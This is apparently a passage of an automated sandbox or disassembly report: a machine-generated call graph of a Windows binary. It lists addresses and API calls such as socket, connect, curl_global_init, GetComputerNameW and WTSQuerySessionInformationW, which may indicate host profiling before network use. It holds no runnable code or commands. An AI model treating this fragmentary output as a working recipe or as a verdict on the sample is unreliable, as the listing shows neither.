7ffa2cef74fd 126754->126776 126758 7ffa2cef7203 memcpy 126756->126758 126756->126824 126757 7ffa2cef70f1 126760 7ffa2cf11830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 126757->126760 126821 7ffa2cef722a 126758->126821 126767 7ffa2cef7514 126759->126767 126759->126824 126760->126761 126761->126753 126868 7ffa2cefa9f0 90 API calls Concurrency::details::SchedulerProxy::DeleteThis 126761->126868 126762 7ffa2cef73fa 126869 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126762->126869 126763 7ffa2cef7264 strcmp 126763->126821 126765 7ffa2cef74a7 126871 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126765->126871 126766->126754 126766->126765 126770 7ffa2cef7615 strcmp 126767->126770 126775 7ffa2cef7646 126767->126775 126774 7ffa2cef7628 126770->126774 126770->126775 126771 7ffa2cef77e1 126773 7ffa2cef7889 _strdup 126771->126773 126800 7ffa2cef7808 126771->126800 126771->126824 126772 7ffa2cef7413 free 126772->126713 126781 7ffa2cef7825 126773->126781 126773->126824 126873 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126774->126873 126777 7ffa2cef76e3 126775->126777 126874 7ffa2cf139e0 isupper tolower isupper tolower 126775->126874 126776->126767 126786 7ffa2cef7576 strcmp 126776->126786 126782 7ffa2cef7779 126777->126782 126879 7ffa2cf139e0 isupper tolower isupper tolower 126777->126879 126778 7ffa2cef739f free 126778->126749 126778->126753 126785 7ffa2cef7975 _strdup 126781->126785 126808 7ffa2cef78b6 126781->126808 126782->126771 126782->126782 126884 7ffa2cf139e0 isupper tolower isupper tolower 126782->126884 126784 7ffa2cef767d 126784->126777 126875 7ffa2cf139e0 isupper tolower isupper tolower 126784->126875 126790 7ffa2cef798e 126785->126790 126785->126824 126786->126767 126787 7ffa2cef7589 strcmp 126786->126787 126787->126767 126791 7ffa2cef759c 126787->126791 126788 7ffa2cef72fa strcmp 126788->126821 126789 7ffa2cef7713 126789->126782 126880 7ffa2cf139e0 isupper tolower isupper tolower 126789->126880 126798 7ffa2cef7a01 strcmp 126790->126798 126819 7ffa2cef79c3 126790->126819 126872 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126791->126872 126795 7ffa2cef7690 126795->126777 126876 7ffa2cf139e0 isupper tolower isupper tolower 126795->126876 126796 7ffa2cef7726 126796->126782 126881 7ffa2cf139e0 isupper tolower isupper tolower 126796->126881 126797 7ffa2cef742a 126870 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126797->126870 126803 7ffa2cef7a1d strcmp 126798->126803 126798->126819 126799 7ffa2cef7867 126887 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126799->126887 126800->126781 126800->126799 126803->126819 126829 7ffa2cef7a3c 126803->126829 126805 7ffa2cef77bf 126805->126771 126885 7ffa2cf139e0 isupper tolower isupper tolower 126805->126885 126807 7ffa2cef7953 126889 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126807->126889 126808->126807 126809 7ffa2cef78d5 126808->126809 126809->126790 126813 7ffa2cef7935 126809->126813 126811 7ffa2cef76a3 126811->126777 126877 7ffa2cf139e0 isupper tolower isupper tolower 126811->126877 126812 7ffa2cef744a free 126812->126713 126888 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126813->126888 126815 7ffa2cef7739 126815->126782 126882 7ffa2cf139e0 isupper tolower isupper tolower 126815->126882 126816 7ffa2cef79f9 126846 7ffa2cef7b79 126816->126846 126891 7ffa2cf11750 RAND_bytes 126816->126891 126819->126816 126820 7ffa2cef7c0d 126819->126820 126819->126846 126893 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126820->126893 126821->126762 126821->126763 126821->126778 126821->126788 126821->126797 126823 7ffa2cef77d2 126823->126824 126886 7ffa2cf139e0 isupper tolower isupper tolower 126823->126886 126895 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126824->126895 126825 7ffa2cef7c65 free 126894 7ffa2cf14980 39 API calls Concurrency::details::SchedulerProxy::DeleteThis 126825->126894 126828 7ffa2cef76b6 126828->126777 126834 7ffa2cef76ba 126828->126834 126829->126819 126835 7ffa2cef7aa2 strcmp 126829->126835 126833 7ffa2cef774c 126833->126782 126839 7ffa2cef7750 126833->126839 126878 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126834->126878 126835->126819 126836 7ffa2cef7ac4 126835->126836 126890 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126836->126890 126837 7ffa2cef7c74 126843 7ffa2cef7c7b _strdup 126837->126843 126838 7ffa2cef7b31 126838->126846 126892 7ffa2cf132e0 GetSystemTimePreciseAsFileTime 126838->126892 126883 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126839->126883 126843->126713 126843->126824 126845 7ffa2cef7b51 _getpid 126845->126846 126846->126713 126846->126825 126848 7ffa2cef691d 126847->126848 126851 7ffa2cef68ee 126847->126851 126848->126679 126849 7ffa2cef6913 126856 7ffa2cef6981 126849->126856 126911 7ffa2cef63c0 10 API calls 126849->126911 126851->126849 126852 7ffa2cef6900 126851->126852 126853 7ffa2cef692f 126851->126853 126910 7ffa2cf0c210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 126852->126910 126904 7ffa2cef34c0 126853->126904 126856->126679 126858 7ffa2cefa1ce 126857->126858 126858->126693 126860->126699 126861->126702 126862->126713 126863->126713 126864->126727 126896 7ffa2cf11db0 _errno 126865->126896 126868->126761 126869->126772 126870->126812 126871->126713 126872->126713 126873->126713 126874->126784 126875->126795 126876->126811 126877->126828 126878->126713 126879->126789 126880->126796 126881->126815 126882->126833 126883->126713 126884->126805 126885->126823 126886->126771 126887->126713 126888->126713 126889->126713 126890->126713 126891->126838 126892->126845 126893->126713 126894->126837 126895->126713 126900 7ffa2cf11df7 126896->126900 126903 7ffa2cf123fc 126896->126903 126897 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126898 7ffa2cef70cf free malloc 126897->126898 126898->126757 126898->126824 126899 7ffa2cf11e46 126899->126900 126901 7ffa2cf12670 fwrite fwrite Concurrency::details::SchedulerProxy::DeleteThis 126899->126901 126899->126903 126900->126899 126902 7ffa2cf123fe _errno 126900->126902 126900->126903 126901->126899 126902->126903 126903->126897 126905 7ffa2cef4dae 126904->126905 126908 7ffa2cef3525 126904->126908 126906 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126905->126906 126907 7ffa2cef4dc9 126906->126907 126907->126849 126908->126905 126912 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126908->126912 126910->126849 126911->126848 126912->126905 126913 7ffa417ebfa0 126917 7ffa417ebfba 126913->126917 126915 7ffa417ec212 126918 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126915->126918 126919 7ffa417ec34e 126915->126919 126916 7ffa417ec1eb 126917->126916 127083 7ffa41866d18 126917->127083 126920 7ffa417ec375 126918->126920 126921 7ffa417ed720 105 API calls 126920->126921 126922 7ffa417ec3b7 126921->126922 126923 7ffa417e5f40 104 API calls 126922->126923 126924 7ffa417ec3c9 126923->126924 126925 7ffa417ec418 126924->126925 126927 7ffa417ed525 126924->126927 126926 7ffa417eed60 148 API calls 126925->126926 126928 7ffa417ec42a 126926->126928 126929 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126927->126929 126930 7ffa417e5f40 104 API calls 126928->126930 126931 7ffa417ed52a 126929->126931 126932 7ffa417ec439 126930->126932 126934 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126931->126934 126932->126931 126933 7ffa417ec481 GetSystemPowerStatus 126932->126933 126935 7ffa417ec47c 126932->126935 126936 7ffa417ec4a6 126933->126936 126937 7ffa417ec4b1 WTSGetActiveConsoleSessionId 126933->126937 126940 7ffa417ed530 126934->126940 126935->126933 126936->126937 126938 7ffa417ec4c6 WTSQuerySessionInformationW 126937->126938 126939 7ffa417ec5df 126937->126939 126938->126939 126941 7ffa417ec502 126938->126941 126942 7ffa417cacf0 104 API calls 126939->126942 126943 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126940->126943 126946 7ffa417cacf0 104 API calls 126941->126946 126963 7ffa417ec5b6 126942->126963 126944 7ffa417ed536 126943->126944 126949 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126944->126949 126945 7ffa417e5f40 104 API calls 126948 7ffa417ec62b 126945->126948 126947 7ffa417ec547 WTSFreeMemory 126946->126947 126951 7ffa417ec561 126947->126951 126947->126963 126950 7ffa417ec673 GetComputerNameW 126948->126950 126954 7ffa417ed58a 126948->126954 126952 7ffa417ed53c 126949->126952 126957 7ffa417ec6af 126950->126957 126953 7ffa417edf80 139 API calls 126951->126953 126956 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126952->126956 126955 7ffa417ec56e 126953->126955 126958 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126954->126958 126955->126940 126955->126963 126959 7ffa417ed542 126956->126959 126960 7ffa417cacf0 104 API calls 126957->126960 126962 7ffa417ed590 126958->126962 126965 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126959->126965 126961 7ffa417ec6f1 126960->126961 126964 7ffa417e5f40 104 API calls 126961->126964 126963->126945 126967 7ffa417ec708 126964->126967 126966 7ffa417ed548 126965->126966 126968 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126966->126968 126967->126954 126969 7ffa417edc90 110 API calls 126967->126969 126970 7ffa417ed54e 126968->126970 126971 7ffa417ec75d 126969->126971 126973 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126970->126973 126972 7ffa417e5f40 104 API calls 126971->126972 126974 7ffa417ec76f 126972->126974 126975 7ffa417ed554 126973->126975 126974->126944 126976 7ffa417ec7b2 126974->126976 126979 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126975->126979 126977 7ffa417ed5a0 106 API calls 126976->126977 126978 7ffa417ec7c4 126977->126978 126980 7ffa417e5f40 104 API calls 126978->126980 126981 7ffa417ed55a 126979->126981 126982 7ffa417ec7d3 126980->126982 126984 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126981->126984 126982->126952 126983 7ffa417ec816 126982->126983 126985 7ffa417cd210 std::_Throw_Cpp_error 104 API calls 126983->126985 126986 7ffa417ed560 126984->126986 126987 7ffa417ec914 126985->126987 126989 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126986->126989 126988 7ffa417e5f40 104 API calls 126987->126988 126990 7ffa417ec928 126988->126990 126991 7ffa417ed566 126989->126991 126990->126959 126992 7ffa417ec96b 126990->126992 126993 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126991->126993 126994 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 126992->126994 126995 7ffa417ed56c 126993->126995 126996 7ffa417ec998 126994->126996 126998 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 126995->126998 126997 7ffa417ea8f0 112 API calls 126996->126997 126999 7ffa417ec9ab 126997->126999 127000 7ffa417ed572 126998->127000 126999->126966 127001 7ffa417ec9e4 126999->127001 127005 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127000->127005 127002 7ffa417ecb95 127001->127002 127003 7ffa417eca0a 127001->127003 127004 7ffa417f01b0 112 API calls 127002->127004 127006 7ffa417c5740 106 API calls 127003->127006 127007 7ffa417ecbb7 127004->127007 127008 7ffa417ed578 127005->127008 127009 7ffa417eca1f 127006->127009 127010 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127007->127010 127013 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127008->127013 127011 7ffa417cd210 std::_Throw_Cpp_error 104 API calls 127009->127011 127012 7ffa417ecbed 127010->127012 127014 7ffa417ecacf 127011->127014 127015 7ffa417f1470 112 API calls 127012->127015 127016 7ffa417ed57e 127013->127016 127017 7ffa417eab30 113 API calls 127014->127017 127018 7ffa417ecc02 127015->127018 127021 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127016->127021 127019 7ffa417ecae2 127017->127019 127020 7ffa417f43f0 104 API calls 127018->127020 127019->126970 127022 7ffa417ecb26 127019->127022 127023 7ffa417ecc45 127020->127023 127024 7ffa417ed584 127021->127024 127022->126975 127027 7ffa417ecb8b 127022->127027 127025 7ffa417ecc51 127023->127025 127026 7ffa417ecc7a MultiByteToWideChar 127023->127026 127028 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127024->127028 127032 7ffa417e5f40 104 API calls 127025->127032 127030 7ffa417cabc0 104 API calls 127026->127030 127027->126954 127029 7ffa417ed4fb 127027->127029 127028->126954 127033 7ffa418518b0 DName::DName 8 API calls 127029->127033 127031 7ffa417eccde MultiByteToWideChar 127030->127031 127031->127025 127034 7ffa417ecd64 127032->127034 127035 7ffa417ed510 127033->127035 127034->126981 127037 7ffa417ecda7 127034->127037 127036 7ffa417ecdeb 127038 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127036->127038 127037->126986 127037->127036 127039 7ffa417ece25 127038->127039 127040 7ffa417f1470 112 API calls 127039->127040 127041 7ffa417ece3a 127040->127041 127042 7ffa417f43f0 104 API calls 127041->127042 127043 7ffa417ece7d 127042->127043 127044 7ffa417ece89 127043->127044 127045 7ffa417eceb2 MultiByteToWideChar 127043->127045 127048 7ffa417e5f40 104 API calls 127044->127048 127046 7ffa417cabc0 104 API calls 127045->127046 127047 7ffa417ecf16 MultiByteToWideChar 127046->127047 127047->127044 127049 7ffa417ecf9c 127048->127049 127049->126991 127050 7ffa417ecfdf 127049->127050 127050->126995 127051 7ffa417ed023 127050->127051 127052 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127051->127052 127053 7ffa417ed05d 127052->127053 127054 7ffa417f1470 112 API calls 127053->127054 127055 7ffa417ed072 127054->127055 127056 7ffa417f43f0 104 API calls 127055->127056 127057 7ffa417ed0b5 127056->127057 127058 7ffa417ed0c1 127057->127058 127059 7ffa417ed0ea MultiByteToWideChar 127057->127059 127062 7ffa417e5f40 104 API calls 127058->127062 127060 7ffa417cabc0 104 API calls 127059->127060 127061 7ffa417ed14e MultiByteToWideChar 127060->127061 127061->127058 127063 7ffa417ed1d4 127062->127063 127063->127000 127065 7ffa417ed217 127063->127065 127064 7ffa417ed25b 127066 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127064->127066 127065->127008 127065->127064 127067 7ffa417ed295 127066->127067 127068 7ffa417f1470 112 API calls 127067->127068 127069 7ffa417ed2aa 127068->127069 127070 7ffa417f43f0 104 API calls 127069->127070 127071 7ffa417ed2ed 127070->127071 127072 7ffa417ed2f9 127071->127072 127073 7ffa417ed322 MultiByteToWideChar 127071->127073 127076 7ffa417e5f40 104 API calls 127072->127076 127074 7ffa417cabc0 104 API calls 127073->127074 127075 7ffa417ed386 MultiByteToWideChar 127074->127075 127075->127072 127077 7ffa417ed40c 127076->127077 127077->127016 127078 7ffa417ed44f 127077->127078 127078->127024 127079 7ffa417ed493 127078->127079 127080 7ffa417efa30 110 API calls 127079->127080 127081 7ffa417ed4a6 127080->127081 127082 7ffa417efba0 112 API calls 127081->127082 127082->127027 127088 7ffa41866ba4 102 API calls _invalid_parameter_noinfo 127083->127088 127085 7ffa41866d31 127089 7ffa41866d48 17 API calls __std_fs_directory_iterator_open 127085->127089 127088->127085 127090 7ffa417eab00 127091 7ffa417eab1f 127090->127091 127092 7ffa417eab0d curl_global_init 127090->127092 127092->127091 127093 7ffa417e8720 127094 7ffa417e878a memcpy_s 127093->127094 127115 7ffa4182fb00 127094->127115 127096 7ffa417e879e 127097 7ffa4182fb00 104 API calls 127096->127097 127098 7ffa417e87e6 127097->127098 127137 7ffa41831b20 127098->127137 127100 7ffa417e8833 127101 7ffa418310e0 112 API calls 127100->127101 127102 7ffa417e887b 127101->127102 127103 7ffa418518d8 std::_Facet_Register 104 API calls 127102->127103 127104 7ffa417e88a4 memcpy_s 127103->127104 127105 7ffa418518d8 std::_Facet_Register 104 API calls 127104->127105 127106 7ffa417e88c6 127105->127106 127107 7ffa4182fb00 104 API calls 127106->127107 127108 7ffa417e88e2 127107->127108 127109 7ffa41831f60 121 API calls 127108->127109 127110 7ffa417e8911 127109->127110 127111 7ffa417e84f0 112 API calls 127110->127111 127112 7ffa417e892a 127111->127112 127113 7ffa418518b0 DName::DName 8 API calls 127112->127113 127114 7ffa417e8a01 127113->127114 127116 7ffa4182fb47 127115->127116 127119 7ffa4182fb22 127115->127119 127141 7ffa418518b0 127116->127141 127119->127116 127120 7ffa4182fb95 127119->127120 127121 7ffa4182fb63 127119->127121 127153 7ffa417c53a0 104 API calls std::_Throw_Cpp_error 127120->127153 127150 7ffa417c53a0 104 API calls std::_Throw_Cpp_error 127121->127150 127124 7ffa4182fb74 127151 7ffa41830190 104 API calls 127124->127151 127125 7ffa4182fba7 127154 7ffa41830190 104 API calls 127125->127154 127128 7ffa4182fb84 127152 7ffa41853f98 RtlPcToFileHeader RaiseException 127128->127152 127129 7ffa4182fbb7 127155 7ffa41853f98 RtlPcToFileHeader RaiseException 127129->127155 127132 7ffa4182fbc8 127156 7ffa4185397c 102 API calls __std_exception_copy 127132->127156 127134 7ffa4182fc02 127157 7ffa417c6990 127134->127157 127136 7ffa4182fc20 127136->127096 127138 7ffa41831b37 127137->127138 127198 7ffa417e9530 112 API calls 127138->127198 127140 7ffa41831b42 127142 7ffa418518b9 127141->127142 127143 7ffa4182fb5a 127142->127143 127144 7ffa418527a4 IsProcessorFeaturePresent 127142->127144 127143->127096 127145 7ffa418527bc 127144->127145 127171 7ffa4185299c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 127145->127171 127147 7ffa418527cf 127172 7ffa41852770 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 127147->127172 127150->127124 127151->127128 127152->127120 127153->127125 127154->127129 127155->127132 127156->127134 127158 7ffa417c69be 127157->127158 127160 7ffa417c6a0a 127158->127160 127163 7ffa417c6a62 127158->127163 127165 7ffa417c69da ctype 127158->127165 127169 7ffa417c6a9d 127158->127169 127170 7ffa417c6a97 127160->127170 127173 7ffa418518d8 127160->127173 127164 7ffa418518d8 std::_Facet_Register 104 API calls 127163->127164 127164->127165 127165->127136 127167 7ffa417c6a20 127167->127165 127168 7ffa41866d18 _invalid_parameter_noinfo_noreturn 102 API calls 127167->127168 127168->127170 127183 7ffa417c2d20 127169->127183 127182 7ffa417c2c80 104 API calls 2 library calls 127170->127182 127171->127147 127175 7ffa418518e3 127173->127175 127174 7ffa418518fc 127174->127167 127175->127174 127177 7ffa41851902 127175->127177 127186 7ffa418711a0 127175->127186 127178 7ffa4185190d 127177->127178 127189 7ffa4184eeb8 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 127177->127189 127190 7ffa417c2c80 104 API calls 2 library calls 127178->127190 127181 7ffa41851913 std::_Facet_Register 127181->127167 127182->127169 127197 7ffa4184ef1c 104 API calls 2 library calls 127183->127197 127191 7ffa418711f0 127186->127191 127188 7ffa418711b2 127188->127175 127190->127181 127196 7ffa41870498 EnterCriticalSection 127191->127196 127193 7ffa418711fd 127194 7ffa418704ec __crtLCMapStringW LeaveCriticalSection 127193->127194 127195 7ffa4187121e 127194->127195 127195->127188 127198->127140 127199 7ffa4187af38 127200 7ffa4187af68 127199->127200 127207 7ffa4187ad68 127200->127207 127203 7ffa4187afa7 127205 7ffa4187afbc 127203->127205 127219 7ffa418629f0 102 API calls 2 library calls 127203->127219 127208 7ffa4187ad91 127207->127208 127209 7ffa4187adbf 127207->127209 127208->127203 127218 7ffa418629f0 102 API calls 2 library calls 127208->127218 127210 7ffa4187add8 127209->127210 127212 7ffa4187ae2f 127209->127212 127221 7ffa41866c40 102 API calls 2 library calls 127210->127221 127220 7ffa418838cc EnterCriticalSection 127212->127220 127214 7ffa4187ae36 127215 7ffa4187ae88 _fread_nolock 102 API calls 127214->127215 127216 7ffa4187ae4d 127214->127216 127215->127216 127217 7ffa418839b4 __std_fs_directory_iterator_open LeaveCriticalSection 127216->127217 127217->127208 127218->127203 127219->127205 127221->127208 127222 7ffa417e5300 127223 7ffa417e5318 127222->127223 127227 7ffa417e5324 ctype 127222->127227 127224 7ffa417e5335 ctype 127225 7ffa417e546e 127225->127224 127229 7ffa418693b8 127225->127229 127226 7ffa418693b8 _fread_nolock 102 API calls 127226->127227 127227->127224 127227->127225 127227->127226 127232 7ffa418693d8 127229->127232 127233 7ffa418693d0 127232->127233 127234 7ffa41869402 127232->127234 127233->127224 127234->127233 127235 7ffa41869411 memcpy_s 127234->127235 127236 7ffa4186944e 127234->127236 127246 7ffa41866668 13 API calls memcpy_s 127235->127246 127245 7ffa418688b0 EnterCriticalSection 127236->127245 127238 7ffa41869456 127240 7ffa4186914c _fread_nolock 102 API calls 127238->127240 127242 7ffa4186946d 127240->127242 127241 7ffa41869426 127247 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 127241->127247 127244 7ffa418688bc __std_fs_directory_iterator_open LeaveCriticalSection 127242->127244 127244->127233 127246->127241 127247->127233 127248 7ffa417f6afb 127299 7ffa4186d450 127248->127299 127250 7ffa417f6b2d 127251 7ffa417f6b53 127250->127251 127252 7ffa4186d450 110 API calls 127250->127252 127253 7ffa417f8330 112 API calls 127251->127253 127252->127251 127254 7ffa417f6b6b 127253->127254 127255 7ffa417f2270 112 API calls 127254->127255 127256 7ffa417f6b78 127255->127256 127257 7ffa417f6b8d 127256->127257 127258 7ffa417f2270 112 API calls 127256->127258 127259 7ffa417c53f0 std::_Throw_Cpp_error 104 API calls 127257->127259 127258->127257 127260 7ffa417f6f68 127259->127260 127261 7ffa417f1a70 105 API calls 127260->127261 127262 7ffa417f6f80 127261->127262 127263 7ffa417f6130 105 API calls 127262->127263 127264 7ffa417f6fa6 127263->127264 127265 7ffa417f1f90 105 API calls 127264->127265 127266 7ffa417f6fb6 127265->127266 127267 7ffa417f6fc5 127266->127267 127268 7ffa417f74b1 127266->127268 127269 7ffa417c67f0 102 API calls 127267->127269 127270 7ffa417efae0 102 API calls 127268->127270 127271 7ffa417f6fd1 __std_exception_destroy 127269->127271 127272 7ffa417f74be 127270->127272 127277 7ffa417c67f0 102 API calls 127271->127277 127273 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127272->127273 127274 7ffa417f74cf 127273->127274 127275 7ffa417efae0 102 API calls 127274->127275 127276 7ffa417f74dd 127275->127276 127278 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127276->127278 127279 7ffa417f6ffd 127277->127279 127280 7ffa417f74ee 127278->127280 127282 7ffa417c67f0 102 API calls 127279->127282 127281 7ffa417efae0 102 API calls 127280->127281 127283 7ffa417f74fc 127281->127283 127284 7ffa417f7008 127282->127284 127285 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127283->127285 127287 7ffa417f17c0 102 API calls 127284->127287 127286 7ffa417f750d 127285->127286 127288 7ffa417efae0 102 API calls 127286->127288 127289 7ffa417f73cf 127287->127289 127290 7ffa417f751b 127288->127290 127291 7ffa418518b0 DName::DName 8 API calls 127289->127291 127292 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127290->127292 127293 7ffa417f73e2 127291->127293 127294 7ffa417f752c 127292->127294 127295 7ffa417efae0 102 API calls 127294->127295 127296 7ffa417f753a 127295->127296 127297 7ffa41853f98 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 127296->127297 127298 7ffa417f754b 127297->127298 127304 7ffa4187b284 102 API calls 2 library calls 127299->127304 127302 7ffa4186d47c __std_fs_directory_iterator_open 127305 7ffa4186d2a8 110 API calls __std_fs_directory_iterator_open 127302->127305 127304->127302 127306 7ffa2cef3bc7 127307 7ffa2cef3bd6 127306->127307 127308 7ffa2cef3c68 free 127307->127308 127309 7ffa2cef3c75 127307->127309 127308->127309 127310 7ffa2cef3ce3 127309->127310 127388 7ffa2cf14cf0 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 127309->127388 127311 7ffa2cef3cea socket 127310->127311 127314 7ffa2cef3d06 WSAGetLastError 127311->127314 127315 7ffa2cef3d6b 127311->127315 127313 7ffa2cef3cbf 127313->127310 127313->127311 127320 7ffa2cef3ccd _strdup 127313->127320 127316 7ffa2cef3d20 127314->127316 127317 7ffa2cef3e0a 127314->127317 127369 7ffa2cef90d0 127315->127369 127316->127317 127321 7ffa2cef3d34 127316->127321 127325 7ffa2cef404b connect 127317->127325 127329 7ffa2cef3e32 strtol 127317->127329 127347 7ffa2cef3e5c 127317->127347 127320->127311 127324 7ffa2cef90d0 25 API calls 127321->127324 127322 7ffa2cef3dd1 127392 7ffa2cf13980 ioctlsocket 127322->127392 127323 7ffa2cef3d7f setsockopt 127323->127322 127326 7ffa2cef3dae WSAGetLastError 127323->127326 127328 7ffa2cef3d43 127324->127328 127333 7ffa2cef4070 WSAGetLastError 127325->127333 127357 7ffa2cef40b3 127325->127357 127391 7ffa2cf0c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 127326->127391 127389 7ffa2cf0c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 127328->127389 127334 7ffa2cef3e4d 127329->127334 127329->127347 127331 7ffa2cef3ddd 127331->127317 127337 7ffa2cef3de1 WSAGetLastError 127331->127337 127339 7ffa2cef4081 WSAGetLastError 127333->127339 127333->127357 127395 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 127334->127395 127335 7ffa2cef3e94 _errno strtol 127336 7ffa2cef3f05 127335->127336 127342 7ffa2cef3ec0 _errno 127335->127342 127358 7ffa2cef3fa8 127336->127358 127359 7ffa2cef3f44 WSAGetLastError 127336->127359 127396 7ffa2cefa920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 127336->127396 127397 7ffa2cefafa0 9 API calls Concurrency::details::SchedulerProxy::DeleteThis 127336->127397 127399 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 127336->127399 127393 7ffa2cf0c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 127337->127393 127338 7ffa2cef3d54 127390 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 127338->127390 127345 7ffa2cef4092 WSAGetLastError 127339->127345 127339->127357 127341 7ffa2cef3d66 127349 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 127341->127349 127342->127336 127350 7ffa2cef3ecf 127342->127350 127354 7ffa2cef40a3 WSAGetLastError 127345->127354 127345->127357 127347->127325 127347->127335 127347->127336 127356 7ffa2cef4dc9 127349->127356 127350->127336 127360 7ffa2cef3ee0 isspace 127350->127360 127351 7ffa2cef3dc8 127394 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 127351->127394 127401 7ffa2cef6990 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 127354->127401 127357->127341 127362 7ffa2cef4012 127358->127362 127363 7ffa2cef3fb5 _errno strtol 127358->127363 127398 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 127359->127398 127360->127336 127360->127350 127362->127325 127364 7ffa2cef4014 127363->127364 127365 7ffa2cef3fda _errno 127363->127365 127364->127325 127400 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 127364->127400 127365->127364 127366 7ffa2cef3fe5 127365->127366 127366->127325 127366->127362 127368 7ffa2cef3ff1 isspace 127366->127368 127368->127364 127368->127366 127370 7ffa2cef914f 127369->127370 127371 7ffa2cef90ff 127369->127371 127376 7ffa2cef91ef 127370->127376 127383 7ffa2cef91c7 127370->127383 127405 7ffa2cf0e2f0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 127371->127405 127373 7ffa2cef912a 127374 7ffa2cf02c50 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 127373->127374 127375 7ffa2cef9136 127374->127375 127406 7ffa2cf0bf90 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 127375->127406 127378 7ffa2cf02c50 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 127376->127378 127379 7ffa2cef91fb 127378->127379 127407 7ffa2cf0bf90 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 127379->127407 127381 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 127382 7ffa2cef3d7a 127381->127382 127382->127322 127382->127323 127402 7ffa2cf02c50 127383->127402 127387 7ffa2cef914a 127387->127381 127388->127313 127389->127338 127390->127341 127391->127351 127392->127331 127393->127351 127394->127317 127395->127347 127396->127336 127397->127336 127398->127336 127399->127336 127400->127362 127401->127357 127408 7ffa2cf02e10 127402->127408 127405->127373 127406->127387 127407->127387 127409 7ffa2cf02c5e 127408->127409 127410 7ffa2cf02e1f GetLastError 127408->127410 127417 7ffa2cf0c3b0 127410->127417 127412 7ffa2cf02e38 127413 7ffa2cf02e43 getenv 127412->127413 127414 7ffa2cf02e6a 127412->127414 127413->127414 127425 7ffa2cf0c420 LeaveCriticalSection 127414->127425 127416 7ffa2cf02e7d SetLastError 127416->127409 127418 7ffa2cf0c3f6 EnterCriticalSection 127417->127418 127419 7ffa2cf0c3c2 127417->127419 127418->127412 127420 7ffa2cf0c3ce 127419->127420 127421 7ffa2cf0c3e4 127419->127421 127423 7ffa2cf0c3d0 Sleep 127420->127423 127421->127418 127424 